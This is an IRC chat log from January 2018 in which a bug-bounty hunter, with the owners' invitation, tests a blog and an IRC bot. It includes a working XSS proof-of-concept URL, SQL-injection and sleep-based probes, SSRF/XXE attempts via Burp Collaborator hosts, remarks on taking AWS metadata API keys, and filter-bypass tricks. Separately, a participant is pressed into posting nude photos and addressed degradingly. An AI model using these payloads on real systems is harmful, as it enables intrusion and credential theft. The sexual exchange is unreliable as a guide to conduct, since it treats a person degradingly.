Forum logs for 26 Jan 2018
| mircea_popescu: | meanwhile in girls alf won't like, http://78.media.tumblr.com/33cb28925c37b2cd04d9ff82a675d37d/tumblr_nh7rhnlD9v1qd7u7zo1_1280.jpg | [00:04] |
| mod6: | both vdiffs fail on this. | [00:04] |
| mod6: | and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think. | [00:06] |
| mircea_popescu: | i expect. | [00:06] |
| mod6: | http://p.bvulpes.com/pastes/MSMop/?raw=true | [00:09] |
| deedbot: | http://www.contravex.com/2018/01/26/the-g-word/ << Contravex: A blog by Pete Dushenski - The G-word. | [01:09] |
| douchebag: | I managed to find two vulnerabilities in Yahoo last night, I highly suggest their bug bounty program for anyone who is interested in doing that sort of stuff. | [01:34] |
| mircea_popescu: | how much do two vulnerabilities in yahoo pay ? | [01:35] |
| douchebag: | Well, I still have to wait until they patch them before they reward the bounty. They pay based on likelyhood/impact, now a friend of mine reported a vulnerability less serious than the one I found and he was rewarded $2,000 total | [01:36] |
| douchebag: | The other one I discovered, I would say probably somewhere between $200-$500 | [01:37] |
| douchebag: | However, even though I have to wait until they patch the bugs I found before they reward me, they did reward me $150 on triage and will be rewarding the rest at a later date | [01:37] |
| douchebag: | You can read his blog here: http://www.sxcurity.pro/ | [01:38] |
| mod6: | i suppose we should be looking for: (--- |\+\+\+ ) instead of (---|\+\+\+) | [01:39] |
| mircea_popescu: | hey, almost better than tits. | [01:39] |
| mircea_popescu: | mod6 YES! | [01:39] |
| mircea_popescu: | i kept sayin' this! | [01:39] |
| douchebag: | A relatively well known bug bounty hunter I know has made $40k this month off of bug bounties, his goal is $50k for January | [01:41] |
| mircea_popescu: | this is like re-reading old shoemoney drivel about google adsense successes. goals and whatnot. | [01:42] |
| douchebag: | Haha, you do have to admit for the average person $40k in a little over 3 weeks is pretty damn good. | [01:44] |
| mircea_popescu: | i certainly admit. | [01:45] |
| mircea_popescu: | but you're not discussing an average person, you're discussing a selected person. | [01:45] |
| mircea_popescu: | i know a girl that made $30 million with her ass and you must admit that for the average girl's ass this is indeed generous. | [01:45] |
| mircea_popescu: | but her ass is not actually all that average. | [01:45] |
| douchebag: | Oh yes, that's very true. However, I do know quite a few people who have been very successful with it | [01:45] |
| mircea_popescu: | i know quite a few people whose iq is over 150. the internet is good at collecting similar things. sadly -- this does little for the intelligence of the race in general. | [01:46] |
| douchebag: | Very true | [01:47] |
| douchebag: | I suppose the point I'm trying to get across is that there is a pretty good community involved with bug bounties, I especially like the classic hacker additude of most of the people in the sense that they're all working together to learn more | [01:50] |
| douchebag: | And how most people are more than willing to share the information they acquire through blogs and whatnot | [01:51] |
| douchebag: | mircea_popescu: Who runs bpvulpes.com? | [02:01] |
| douchebag: | < | [02:02] |
| trinque: | surely you can sleuth that one out. | [02:04] |
| douchebag: | Ohh lol I'm retarded | [02:04] |
| douchebag: | ben_vulpes: I found a vulnerability in your site, how would you like me to disclose it to you? | [02:05] |
| douchebag: | It's not a major issue and an easy fix, however it could potentially allow someone to create fake logs | [02:07] |
| trinque: | guy's probably away for the night. why don't you drop him a gpggram on his paste site, link him to it here | [02:08] |
| douchebag: | Forsure | [02:08] |
| trinque: | !!key ben_vulpes | [02:09] |
| deedbot: | http://wot.deedbot.org/4F7907942CA8B89B01E25A762AFA1A9FD2D031DA.asc | [02:09] |
| douchebag: | Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-) | [02:09] |
| trinque: | might help you more to do that reading I was talking about, and get a v-tron set up. | [02:10] |
| * trinque | off for the night as well | [02:10] |
| douchebag: | ben_vulpes: http://p.bvulpes.com/pastes/VGhcp/?raw=true | [02:15] |
| mircea_popescu: | douchebag ben_vulpes | [02:35] |
| douchebag: | Mhmmm I already got it, thanks anyway though | [02:36] |
| mircea_popescu: | :p | [02:36] |
| douchebag: | mircea_popescu: any sites you want me to take a look at really quick? | [02:37] |
| mircea_popescu: | wp-mp, basically, like last time. | [02:38] |
| douchebag: | To make my job a little bit easier, could you tell me a little bit about mp-wp and how it differs from Wordpress? | [02:39] |
| mircea_popescu: | http://trilema.com/forum-logs-for-23-jan-2018#2399979 < | [02:39] |
| a111: | Logged on 2018-01-23 07:11 mircea_popescu: actually, hanbot is about to genesis mp-wp, you're more than welcome to help down with the paring down effort of that, if you want. mostly php. | [02:39] |
| mircea_popescu: | it's a fork off 2.7 wp trunk iirc. | [02:39] |
| mircea_popescu: | hanbot just published an unofficial genesis, so you can just fire up your v and press that | [02:41] |
| douchebag: | Where can I find a copy of the source? | [02:43] |
| mircea_popescu: | http://btcbase.org/log/2018-01-25#1775994 | [02:45] |
| a111: | Logged on 2018-01-25 06:00 hanbot: http://btcbase.org/log/2018-01-25#1775981 >> can grab http://thewhet.net/testickle/mp-wp_genesis.vpatch & http://thewhet.net/testickle/mp-wp_genesis.vpatch.hanbot.sig pubkey's on about page if you need it. | [02:45] |
| douchebag: | mic | [02:54] |
| douchebag: | mircea_popescu: I have discovered a vulnerability :-) | [02:55] |
| douchebag: | How would you like me to disclose this? | [02:55] |
| mircea_popescu: | by saying what it is lel | [03:26] |
| douchebag: | Cross Site Scripting | [03:28] |
| mircea_popescu: | but be specific | [03:28] |
| douchebag: | Is it alright if I link you to a PoC of the vulnerability? | [03:28] |
| mircea_popescu: | sure. | [03:28] |
| douchebag: | Alright one moment | [03:29] |
| douchebag: | http://trilema.com/mp_fabulous_hashonator.php?m=%3Csvg/onload=alert`XSS`%3E | [03:29] |
| mircea_popescu: | does that actually do something ? | [03:30] |
| douchebag: | I was able to execute arbitrary Javascript on your site | [03:30] |
| mircea_popescu: | all i see is https://archive.is/Kbau3 | [03:31] |
| douchebag: | XSS can be used to steal cookies of logged in users which can then be used to jack their session. | [03:31] |
| mircea_popescu: | but you can't log into trilema. | [03:31] |
| douchebag: | So there is never a session stored on the site? | [03:32] |
| mircea_popescu: | not afaik moreover, does an alert box actually pop up for you ? | [03:32] |
| douchebag: | Yes | [03:33] |
| mircea_popescu: | odd, neither archive bot not this testbox firefox i have do it. | [03:33] |
| douchebag: | http://trilema.com/mp_fabulous_hashonator.php?m=%3Ch1%20style=%22color:%20red%22%3E | [03:34] |
| douchebag: | Go there | [03:34] |
| douchebag: | You'll see arbitrary html was added to the page | [03:34] |
| mircea_popescu: | http://browsershots.org/http://trilema.com/mp_fabulous_hashonator.php?m=%3Csvg/onload=alert%60XSS%60%3E << lulzty enough. | [03:34] |
| mircea_popescu: | douchebag was this actually in mp-wp ?! | [03:35] |
| mircea_popescu: | this is hysterical, apparently it works in newer (3x, 4x firefox) but not in older (2x say). | [03:36] |
| douchebag: | It might be, I'm not sure at the moment if this was added with mp-wp or if it was uploaded to trilema.com's webhost a later date | [03:36] |
| douchebag: | Oh yeah, javscript is great isn't it? | [03:36] |
| mircea_popescu: | notreally. | [03:36] |
| douchebag: | lol I was being sarcastic | [03:37] |
| mircea_popescu: | anyway, i suppose "the message chosen was $" is just bad webcoding on my part. | [03:38] |
| * mircea_popescu | has ~0 experience with this, an' i guess it shows. | [03:38] |
| douchebag: | Don't feel bad, XSS is one of the most common vulnerabilities that exists on the majority of websites | [03:39] |
| mircea_popescu: | but this browsershots set is a comedy goldmine! apparently a good third of the failful firefox browsers ALSO are getting an "uptades" blabla popup | [03:39] |
| douchebag: | lol | [03:40] |
| douchebag: | hmm i wonder | [03:44] |
| douchebag: | <script>alert`OHAI`</script> | [03:44] |
| douchebag: | I wonder if any of the logs will pop an alert | [03:45] |
| mircea_popescu: | apparently not | [03:47] |
| douchebag: | mircea_popescu: So the bots in this channel for instance the one that will add your GPG key from a url you provide | [03:51] |
| mircea_popescu: | aha | [03:51] |
| douchebag: | That actually can hold quite the potential of a vulnerability | [03:51] |
| douchebag: | If it | [03:51] |
| douchebag: | If it's returning page responses in any way, it could be used to access internal network addresses | [03:52] |
| mircea_popescu: | go ahead and try it | [03:52] |
| douchebag: | What are the commands that have that sort of functionality? | [03:52] |
| mircea_popescu: | !!register ? | [03:52] |
| deedbot: | 6160E1CAC8A3C52966FD76998A736F0E2FB7B452 is already registered as mircea_popescu. | [03:52] |
| douchebag: | !!help | [03:52] |
| deedbot: | http://deedbot.org/help.html | [03:52] |
| douchebag: | ooh I have an idea | [03:53] |
| douchebag: | 1sec | [03:53] |
| douchebag: | !!subscribe https://my.mixtape.moe/kcoilr.xml | [03:54] |
| deedbot: | douchebag subscription to https://my.mixtape.moe/kcoilr.xml failed | [03:54] |
| douchebag: | !!subscribe https://my.mixtape.moe/spofpo.xml | [03:55] |
| deedbot: | douchebag subscription to https://my.mixtape.moe/spofpo.xml failed | [03:55] |
| douchebag: | !!subscribe http://c6jqm84m3hami0jwzts22crxmosgg5.burpcollaborator.net | [03:56] |
| deedbot: | douchebag subscription to http://c6jqm84m3hami0jwzts22crxmosgg5.burpcollaborator.net failed | [03:56] |
| mircea_popescu: | you probably need a rss feed | [03:57] |
| douchebag: | Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data | [03:59] |
| mircea_popescu: | not a bad idea. | [03:59] |
| douchebag: | !!deed darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net | [04:00] |
| deedbot: | Bad URL or network outage. | [04:00] |
| douchebag: | !!deed http://darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net | [04:00] |
| deedbot: | Bad URL or network outage. | [04:00] |
| mircea_popescu: | douchebag it has to be signed | [04:00] |
| douchebag: | Ah | [04:01] |
| douchebag: | !!deed gopher://darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net:80/_TEST | [04:01] |
| deedbot: | Bad URL or network outage. | [04:01] |
| douchebag: | That would have been cool if it worked | [04:01] |
| douchebag: | Honestly, I bet a lot of boxes could be popped just from messing around with IRC bots lol | [04:09] |
| mircea_popescu: | you think ? | [04:09] |
| douchebag: | oh definitely | [04:10] |
| mircea_popescu: | well... go for it. | [04:10] |
| douchebag: | Here's a fun fact, | [04:11] |
| douchebag: | http://169.254.169.254/latest/meta-data/ | [04:11] |
| douchebag: | IF I were able to find a bot that essentially returned the content of that URL and it was hosted on Amazon AWS | [04:11] |
| douchebag: | I could grab the AWS Instances API keys lol | [04:12] |
| douchebag: | https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html | [04:12] |
| douchebag: | It's the simple things like that which can do that most damage | [04:13] |
| mircea_popescu: | interesting. | [04:16] |
| douchebag: | Hmm, I wonder | [04:16] |
| douchebag: | !! key ' or '1'='1 | [04:16] |
| douchebag: | !!key ' or '1'='1 | [04:16] |
| douchebag: | !!key douchebag | [04:17] |
| deedbot: | http://wot.deedbot.org/5A067BA31976B2576818247075CD5709D6509291.asc | [04:17] |
| douchebag: | !!key douchebag' | [04:17] |
| deedbot: | Not registered. | [04:17] |
| douchebag: | !!key douchebag 1 | [04:17] |
| douchebag: | !!key douchebag|sleep(10) | [04:17] |
| deedbot: | Not registered. | [04:17] |
| douchebag: | !!key douchebag'|sleep(10) | [04:17] |
| deedbot: | Not registered. | [04:17] |
| douchebag: | !!key douchebag"|sleep(10) | [04:17] |
| deedbot: | Not registered. | [04:17] |
| mircea_popescu: | douchebag you can also do it in pm | [04:18] |
| douchebag: | oh okay | [04:18] |
| mircea_popescu: | !!up emmylark | [04:25] |
| deedbot: | emmylark voiced for 30 minutes. | [04:25] |
| mircea_popescu: | say hello to the group, slut. | [04:25] |
| emmylark: | Hello sirs | [04:25] |
| emmylark: | *and madames. don't wanna discriminate | [04:25] |
| mircea_popescu: | hehe | [04:26] |
| mircea_popescu: | emmylark so write 4b57ff75 on your tits and get your slit in the shot as well. | [04:26] |
| emmylark: | http://p.bvulpes.com/pastes/X7SkS/?raw=true | [04:38] |
| mircea_popescu: | aww, for me ?! | [04:39] |
| mircea_popescu: | aite lessee here... | [04:39] |
| emmylark: | http://p.bvulpes.com/pastes/exv9a/?raw=true | [04:41] |
| mircea_popescu: | emmylark congrats, you're now famous! | [04:42] |
| douchebag: | Hell yeah | [04:42] |
| mircea_popescu: | tell me... how does it feel... to be all nude... like a hm... like a rolling stone. | [04:42] |
| douchebag: | congratz on being famous | [04:42] |
| emmylark: | How did I do sir? Was it acceptable? I sent a second one just in case the first wasnt enough. I thought it might be nice to get to choose | [04:43] |
| mircea_popescu: | quite acceptable, yes. | [04:43] |
| mircea_popescu: | now put your public key in a paste and say !!register url | [04:44] |
| mircea_popescu: | emmylark it's very nice to get to choose i choose to keep the second for my private collection of smutty selfies. | [04:45] |
| emmylark: | !!register urlhttp://p.bvulpes.com/pastes/U1Xh4/?raw=true | [04:49] |
| deedbot: | Provide a paste URL to the ascii-armored GPG public key or the full 40 character key fingerprint without spaces or dashes. | [04:49] |
| mircea_popescu: | emmylark !!register http://p.bvulpes.com/pastes/U1Xh4/?raw=true | [04:49] |
| emmylark: | !!register http://p.bvulpes.com/pastes/U1Xh4/?raw=true | [04:50] |
| deedbot: | 3BC472963B76AEE0448C19F414DEC3397D761EA4 registered as emmylark. | [04:50] |
| emmylark: | Fuck yeah! | [04:50] |
| mircea_popescu: | emmylark did you ever register your name with freenode ? | [04:50] |
| mircea_popescu: | say /msg nickserv register your_password your_email_address use a good password and an email you actually can read, they'll send you a verification thing. this way someone else can't steal your name. | [04:51] |
| emmylark: | I'm talking to you through the Freenode server in my IRC client. It made me register a name and email. | [04:52] |
| mircea_popescu: | !!rate emmylark 1 Slutty pixie bearing my protection collar. | [04:52] |
| deedbot: | Get your OTP: http://p.bvulpes.com/pastes/oK6cP/?raw=true | [04:52] |
| mircea_popescu: | !!pay emmylark 0.02 | [04:52] |
| deedbot: | Get your OTP: http://p.bvulpes.com/pastes/sU3kd/?raw=true | [04:52] |
| mircea_popescu: | emmylark congrats on earning your first coupla bitcents! | [04:52] |
| emmylark: | Wait are you serious? I did that for you sir. | [04:53] |
| mircea_popescu: | i know. | [04:53] |
| douchebag: | Will hack 4 BTC :-D | [04:55] |
| mircea_popescu: | !!up emmylark | [04:55] |
| deedbot: | emmylark voiced for 30 minutes. | [04:55] |
| mircea_popescu: | i rated you, so now the bot will allow you to voice yourself. say /query deedbot and then !!up it will give you a thing to decrypt, give the result back to it as !!v <string> | [04:56] |
| mircea_popescu: | win. | [05:01] |
| douchebag: | I just learned about AngularJS XSS attacks | [05:24] |
| douchebag: | Pretty interesting stuff | [05:24] |
| shinohai: | !~ticker --market all | [07:41] |
| jhvh1: | shinohai: Bitstamp BTCUSD last: 10531.07, vol: 14129.46495924 | Bitfinex BTCUSD last: 10527.0, vol: 49688.74405499 | Kraken BTCUSD last: 10538.0, vol: 6394.72947932 | Volume-weighted last average: 10528.8208745 | [07:41] |
| shinohai: | Morning tmsr | [07:49] |
| mod6: | mornin' | [09:47] |
| shinohai: | Heya mod6 | [09:59] |
| mod6: | how goes? | [10:22] |
| asciilifeform: | meanwhile, in heathendom, https://archive.is/rTmuG >> 'The first freight deal settled in Bitcoin was executed last month on a vessel carrying wheat from top shipper Russia to Turkey, according to Prime Shipping Foundation, the venture behind the transaction. ... The vessel used in Prime Shipping’s transaction carried 3,000 metric tons of wheat from Rostov-on-Don to Samsun. ' | [10:28] |
| BingoBoingo: | Awe, shit can only go up from wheat | [10:43] |
| mircea_popescu: | but i thought they already had a perfect medium of exchange called the unified standard dosidoe! | [10:59] |
| mod6: | :D | [11:00] |
| mircea_popescu: | spyked all in. | [11:00] |
| mircea_popescu: | ah, yeah. http://trilema.com/2014/ill-pay-for-your-tits/#selection-309.2-309.31 in case anyone's missed it. | [11:03] |
| asciilifeform: | neato | [11:03] |
| mircea_popescu: | wait, you like blue eyed girls now ?! | [11:03] |
| asciilifeform: | for so long as upside down!111 | [11:04] |
| mircea_popescu: | lmao | [11:04] |
| mircea_popescu: | in her case, that's the up side. | [11:04] |
| shinohai: | Nice! | [11:04] |
| * asciilifeform | must admit that the http://btcbase.org/log/2018-01-26#1776811 thread reminds him of http://btcbase.org/log/2016-05-01#1460013 | [11:05] |
| a111: | Logged on 2018-01-26 08:59 douchebag: Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data | [11:05] |
| a111: | Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS and so does "GET /blog/blog-config.php~". | [11:05] |
| mircea_popescu: | hey, he did find a trilema vulnerability... | [11:05] |
| lobbes: | http://btcbase.org/log/2018-01-26#1776736 << you really should do the homework trinque pointed you to, but if you are done with that and bored again, plox to look at logs.minigame.bz, lobbesblog.com and lobbesbot? I'm a meganoob so you may find something. I've no shame, so disclose whatever you can find here. I'll toss a handful of satoshis your way if you do (and a wot rating) | [11:07] |
| a111: | Logged on 2018-01-26 07:09 douchebag: Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-) | [11:07] |
| lobbes: | Most of the 'dynamic' bits of the www are php+sqlite3. lobbesbot is limnoria (fork of supybot, a common python bot api), also atop sqlite3 | [11:10] |
| * trinque | appreciates the deedbot fuzzing. pretty damned sure all my inputs are quoted though. | [11:12] |
| mircea_popescu: | indeed, but being surer never hurt anything. | [11:14] |
| trinque: | naw, fuzz away | [11:14] |
| mircea_popescu: | in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his syustem, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ? | [11:15] |
| mircea_popescu: | i suppose i should rate him. | [11:15] |
| mircea_popescu: | !!rated douchebag | [11:15] |
| deedbot: | mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions | [11:15] |
| mircea_popescu: | ah, already did. go me. | [11:15] |
| mircea_popescu: | and in other news, http://www.gutenberg.org/files/3178/3178-h/3178-h.htm << pretty decent yarn, mark twain's forgotten novel. | [11:23] |
| asciilifeform: | oblig re quotation of inputs -- http://btcbase.org/log/2015-08-13#1237281 | [11:26] |
| a111: | Logged on 2015-08-13 19:00 phf: mats: well, i actually meant the opposite. classes of attacks can be eliminated by not using c. i think that majority of the attacks come from leaky abstractions. there's no <string> in c, but there's a null terminated memory region. there's no <sql> in perl, but there's a character array with sql text in it. one of the solutions is to plug abstraction holes on a level of the language, in such a way that you can't not use improved abstractions | [11:26] |
| mircea_popescu: | asciilifeform there's two fundamental items i can readily identify, maybe more. 1. i actually did plop an echo $_GET in there. is this just bad coding ? is it a legitimate assumption ? 2. he has a point, as long as it's on trilema.com, a script has powers OUTSIDE of its implicit scope, "steal cookies" whatever. is this ~actually~ bad systems design ? | [11:27] |
| mircea_popescu: | obviously quoted link's right other than the attacks croming from nsa ("enemy" aka idiot with vested interest in idiocy), they ALL come from leaky abstractions. both points above qualify. | [11:29] |
| asciilifeform: | mircea_popescu: do you recall the case of http://btcbase.org/log/2016-08-01#1512390 ? | [11:29] |
| a111: | Logged on 2016-08-01 19:48 asciilifeform: oh for fuckssake. | [11:29] |
| mircea_popescu: | i do. | [11:29] |
| asciilifeform: | https://archive.is/PSU53 << ftr | [11:29] |
| asciilifeform: | the other way to think of it, is that for so long as you have a box that eats rubbish from randos, you have a mechanism for folx to host shitware to use against firefox-besotted js victims etc | [11:31] |
| asciilifeform: | whether this matters -- is separate q | [11:31] |
| mircea_popescu: | is this right ? | [11:31] |
| mircea_popescu: | consider the celebrated lulz of (most recently) http://btcbase.org/log/2017-11-06#1733263 : none of those curls are sanitized. yet http://btcbase.org/log/2018-01-16#1771208 right ? | [11:33] |
| a111: | Logged on 2017-11-06 19:27 deedbot: http://trilema.com/2017/how-the-beastforumcom-private-messaging-function-became-a-paid-user-only-item/ << Trilema - How the beastforum.com private messaging function became a paid-user-only item | [11:33] |
| a111: | Logged on 2018-01-16 17:08 mircea_popescu: (also, let it be pointed out for the benefit of the future noob : the use of xargs with shit from curl is dancing with the wolves. finest way to lose a box.) | [11:33] |
| asciilifeform: | let's picture the general case. the pgpkey xss thing did not 'fire' against phuctor viewers, because quoted. but did against wotpaste reader ( with 0 practical effect , but for the principle of the thing ) | [11:33] |
| mircea_popescu: | well which the fuck is it, and don't tell me "why mp! perl=bash=php=crap", it's not the point. | [11:33] |
| asciilifeform: | but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ? | [11:34] |
| mircea_popescu: | RIGHT ? | [11:34] |
| asciilifeform: | the fundamental q is whether there is a diff b/w 'enabled js' and 'enabled opensesamism' | [11:34] |
| mircea_popescu: | if i'm responsible for the above why am i not responsible for sending emmylark nude on a harley to luser's house to tear out intel ME out of his chip ? | [11:34] |
| asciilifeform: | that's the idea. | [11:34] |
| mircea_popescu: | as i said, sent me meditating on nature of things | [11:35] |
| mircea_popescu: | but the "you enabled js, you're dead" position is untenable -- i use js for the selection thing. and i fucking need it | [11:35] |
| asciilifeform: | it isn't , as it happens, particularly difficult to neuter js in pasteolade. but that's separate , imho, matter. | [11:35] |
| mircea_popescu: | without the ability to link INSIDE my output $value would decrease sensibly. not a little. a lot. | [11:35] |
| asciilifeform: | no i get. | [11:35] |
| asciilifeform: | i use the feature also. | [11:36] |
| mircea_popescu: | i honestly believe it's as big as the concept of link. | [11:36] |
| asciilifeform: | it's a poor man's tednelsonlink | [11:36] |
| mircea_popescu: | this triad : links, pingbacks, selection reference make up a whole NEW hypertext. just as far from the old as that was from text. | [11:36] |
| mircea_popescu: | asciilifeform half of one, yes. needs the pingback to be full. | [11:37] |
| asciilifeform: | well, ~wants~ to 'make new hypertext', really it's a sad emulation. but considerable improvement over nothingatall | [11:37] |
| mircea_popescu: | i guess so, at that. | [11:37] |
| mircea_popescu: | "poc" right. | [11:38] |
| asciilifeform: | the interesting thing re js, is that entirely ~aside~ from traditional cmachine bugolade, it gets compiled c-cstyle nowadays, in popular graphical wwwbrowsers, ( how else to churn 50MB of google crapola ) and so e.g. rowhammerism works in it. | [11:39] |
| mircea_popescu: | oya. | [11:39] |
| mircea_popescu: | note the epic lulz of how the "vulnerability" doesn't even work until you gert to ff version 30. | [11:39] |
| mircea_popescu: | there's a pile of browser captures linked in there yest. | [11:39] |
| asciilifeform: | the xss thing ? aha | [11:39] |
| mircea_popescu: | (because they didn't parse svg tags prior, not because "it doesn't work", he could have made it to work with plain script, so it's a separate issue, but quite germane) | [11:40] |
| mircea_popescu: | imo a fabulous textbook example of how the imperial vulnerability cycle goes. 1. make a bad spec, a la SMGL 2. implement some portions of it only, because http://btcbase.org/log/2018-01-25#1776189 3. discover the bad spec is vulnerable, issue "best practices" for people to "santize". obviously this will not be made by 1 if 2 wasn't, so... 4) implement slightly more of the spec, throw security in disarray. | [11:42] |
| a111: | Logged on 2018-01-25 16:42 asciilifeform: i dun actually disagree with mircea_popescu : i never liked bigendianism . but it did come from a particular cost analysis , ftr. | [11:42] |
| mircea_popescu: | this is EXACTLY how it goes, and perhaps why there has not yet existed such a thing as a fully implemented specification or a fully specified implementation in empire lands. | [11:42] |
| asciilifeform: | the philosophical puzzler of 'what is a vuln' probably cannot be answered from strictly 1side pov. consider the ultimate degenerate case, microshit, who produces more vulns every day than mircea_popescu spermatozoids , but not 1 of them dings it in any substantial way ( and many in fact are a profit ) | [11:43] |
| mircea_popescu: | are you implying my sperm count is low ? | [11:43] |
| asciilifeform: | lol | [11:43] |
| mircea_popescu: | lol | [11:43] |
| mircea_popescu: | hey, i was looking for a pretext to get a test, so bbs. | [11:44] |
| asciilifeform: | and the 'bad spec' thing is part of multilayered shit sandwich, the general principle is that complexicrud accretes the overflows, etc. follow naturally ( with helping hand from kochs, dreppers, et al as necessary ) | [11:45] |
| asciilifeform: | mircea_popescu: lo, aaaah, but where will you get a microshit bugcount. the stars in the sky themselves not sufficient to count !11! | [11:46] |
| asciilifeform: | re specs, whole thread ( e.g. http://btcbase.org/log/2016-08-01#1512423 ) re pgpkey worth a reread. | [11:50] |
| a111: | Logged on 2016-08-01 20:03 phf: mircea_popescu: a lot of xss detection "solutions" rely on grepping for known bad input, like "script" or whatever. and there are ways to sidestep that, like '<scr' + 'ipt>' or a='ipt>''<scr'+a. in this case whoever is fucking with detection by using this truly wtf feature i've never heard of, <meta charset="a">b</meta> that apparently parses b according to charset a rules | [11:50] |
| mircea_popescu: | asciilifeform slavegirl tasted, says my sperm count's fine (and delicious). so NYAH! | [11:58] |
| asciilifeform: | congrats | [11:58] |
| mircea_popescu: | i suppose on contemplation the http://btcbase.org/log/2018-01-25#1776155 would be to fucking sign javascript and you know "hey, we've had v for a while, get with the program. why are you running unsigned nonsense". | [11:58] |
| a111: | Logged on 2018-01-25 16:29 mircea_popescu: wait wait, i might have a pill | [11:58] |
| mircea_popescu: | i guess ima actually do just that. | [11:59] |
| asciilifeform: | gonna luvv the multi-second pageloads | [11:59] |
| asciilifeform: | or wouldja cache it, or how | [11:59] |
| mircea_popescu: | what's js comment style, # ? | [12:00] |
| asciilifeform: | iirc c-style /* */ | [12:00] |
| asciilifeform: | but what'll that do if browser dun check the sig | [12:00] |
| deedbot: | http://www.thedrinkingrecord.com/2018/01/26/la-desfile-de-inaugural-de-carnival/ << Bingo Blog - La Desfile De Inaugural De Carnival | [12:00] |
| asciilifeform: | mircea_popescu: this is one of those items that really wants the rsa fpga | [12:01] |
| mircea_popescu: | / | [12:03] |
| mircea_popescu: | // motherfucker who comes up with this shit | [12:03] |
| * asciilifeform | waits for mircea_popescu to scream in 'joy' when he finds that not 1 attempt at any such pgpsig verifies, on account of newline mutilation in www stack | [12:04] |
| mircea_popescu: | !!deed http://p.bvulpes.com/pastes/iSV8M/?raw=true | [12:05] |
| deedbot: | accepted: 1 | [12:06] |
| mircea_popescu: | asciilifeform i didn't expect it'd work mechanically but there it is now. | [12:06] |
| mircea_popescu: | in the future, it can be mecanicized. | [12:06] |
| asciilifeform: | aa i see | [12:06] |
| mircea_popescu: | i suppose the workings of this insane nut posse must be quite disconcerting to the professional. "i told this guy he had an xss hole in some file and he proceeded to sign an unrelated snippet of javascript". | [12:07] |
| asciilifeform: | a flounder in epoxy , then. | [12:07] |
| mircea_popescu: | but, take heart douchebag : there's not that many people your age that can say "hey, i sent mp to meditation room" and they're overwhelmingly female to boot. | [12:07] |
| mircea_popescu: | asciilifeform admire the recursive gift : his "reputation in the community" doth indeed grow. what now. | [12:08] |
| asciilifeform: | why is this a whatnow | [12:08] |
| asciilifeform: | for any of us, i mean | [12:08] |
| mircea_popescu: | well... didn't the problem appear misstated originally ? | [12:09] |
| asciilifeform: | how's that? i dungetit | [12:09] |
| mircea_popescu: | hm. | [12:10] |
| mircea_popescu: | http://btcbase.org/log/2018-01-23#1774915 << say. | [12:10] |
| a111: | Logged on 2018-01-23 19:52 phf: i can see the education angle, and how it fails these people, but what i'm surprised about is the lack of personal drive? it's some kind of learned helplessness | [12:10] |
| asciilifeform: | sticking to wwwtardism stack is not a manifestation of learnedhelplessness ? | [12:12] |
| mircea_popescu: | not if it works to deliver the results above ? | [12:12] |
| asciilifeform: | i dun see a megaresult. | [12:12] |
| mircea_popescu: | in entirely unrelated lulz : i recommend to the expert entomologist item #341 of the assembly of the state of new york, entered into record april 12, 1838 (a message from W L Marcy, the governor). | [12:13] |
| asciilifeform: | got text ? or does one have to go to nyc and break into a museum to get it | [12:13] |
| mircea_popescu: | at issue is the resumption of a redeemable currency in fact, through payments in specie, supported by new york alone and firmly opposed by our good friends in http://trilema.com/2018/the-principal-agent-problem-or-how-america-went-away/#footnote_9_77193 (ie, 2nd national bank and the wide array of western and southern banks dependent upon it. because guess who brought you slavery in the sense of financing it ? oh yeah, the re | [12:15] |
| mircea_popescu: | formists!) | [12:15] |
| mircea_popescu: | asciilifeform i got a hardbound copy. shall i have it transcribed ? | [12:15] |
| phf: | !!key hanbot | [12:15] |
| deedbot: | http://wot.deedbot.org/EA0FAD90985B3025576A5061454B0FC0BC07B87E.asc | [12:15] |
| asciilifeform: | mircea_popescu: or even photo, if it's reasonably compact | [12:15] |
| asciilifeform: | ( and lol, this has gotta be the 1st time i hear mircea_popescu refer to a hardcopy of sumthing..? ) | [12:16] |
| mircea_popescu: | not the first, but yes, rare. | [12:16] |
| mircea_popescu: | ah, check it out, google has it. one moment. | [12:18] |
| ben_vulpes: | douchebag: how does this allow a user to create fake logs? | [12:18] |
| asciilifeform: | !~later tell mod6 http://btcbase.org/log/2018-01-26#1776700 seems to be ye olde http://btcbase.org/log/2016-12-11#1581504 inbandism crapola | [12:21] |
| a111: | Logged on 2018-01-26 05:06 mod6: and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think. | [12:21] |
| a111: | Logged on 2016-12-11 20:15 mircea_popescu: +++7F0QaZAgBgF3/7448/fmnc/DnT29zJipI3ZCWnifqyfJH6/nRzUt7979al5JtwrACPLNjDb5Pc false <<< ahahaha epic! | [12:21] |
| jhvh1: | asciilifeform: The operation succeeded. | [12:21] |
| mircea_popescu: | it is. | [12:24] |
| asciilifeform: | hey mircea_popescu : asciilifeform sat down and tried to make a 'and i'll give you a 1btc prize' puzzler for douchebag re 'break pehbot' . but how to phrase the condition of said puzzle, i am still at a loss, burned half hour nearly. | [12:27] |
| asciilifeform: | specifically such that puzzler specifically rewards the breaking of the proggy, rather than the condition. | [12:27] |
| asciilifeform: | or is this a perpetuum mobile. | [12:27] |
| mircea_popescu: | i suspect this is what we are gazing upon in amazement : that slavegirl must ~love~, ie that there is no mechanical solution to the problem. | [12:30] |
